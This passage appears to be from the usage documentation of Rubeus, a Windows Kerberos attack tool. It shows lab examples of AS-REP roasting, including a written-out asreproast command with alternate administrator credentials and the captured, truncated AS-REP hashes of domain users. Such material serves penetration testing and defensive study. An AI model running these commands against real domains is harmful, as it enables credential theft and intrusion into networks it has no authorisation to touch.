[*] Connecting to 192.168.52.105:88
[*] Sent 175 bytes
[*] Received 1448 bytes
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

    $krb5asrep$devuser3@dev.testlab.local:650B881E44B92FB6A378DD21E8B020...(snip)...
```

AS-REP roasting users in a foreign non-trusting domain using alternate credentials:

```
C:\Rubeus>Rubeus.exe asreproast /domain:external.local /creduser:"EXTERNAL.local\administrator" /credpassword:"Password123!"

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.4


[*] Action: AS-REP roasting

[*] Target Domain          : external.local

[*] Using alternate creds  : EXTERNAL.local\administrator

[*] SamAccountName         : david
[*] DistinguishedName      : CN=david,CN=Users,DC=external,DC=local
[*] Using domain controller: external.local (192.168.52.95)
[*] Building AS-REQ (w/o preauth) for: 'external.local\david'
[*] Connecting to 192.168.52.95:88
[*] Sent 165 bytes
[*] Received 1376 bytes
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

    $krb5asrep$david@external.local:9F5A33465C53056F17FEFDF09B7D36DD$47DBAC3...(snip)...
```
